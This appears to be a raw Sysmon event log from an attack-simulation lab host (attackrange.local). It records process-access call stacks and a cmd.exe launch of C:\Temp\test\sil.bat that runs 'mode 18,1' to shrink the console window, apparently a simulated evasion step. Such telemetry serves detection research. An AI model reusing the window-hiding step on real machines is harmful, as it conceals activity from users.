07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.200{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.208{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\System32\mode.com10.0.14393.0 (rs1_release.160715-1616)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=614F8D56EE8470746B6F68CEA0C2A838,SHA256=95696BF3D50A47A840D8CED5CD0E88677372411E9AB698B644244051B69C6E6A,IMPHASH=FD0E8966C3BCFE9DE1C17814481140CD{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.183{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.147{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.147{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.147{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001050563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88863E4281176D48D00A6171BF4BE378,SHA256=8BC38FC67941AFBC42F68C429D6551814FC0B29AB511C42AC6BB1C8BA48B2156,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDBSetValue2021-07-12 07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\test\sil.batBinary Data 10341000x80000000000000001050561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.132{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-32D3-60E8-770B-00000000CF01}63569544C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+18cf7c|C:\Windows\System32\SHELL32.dll+18ccd3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+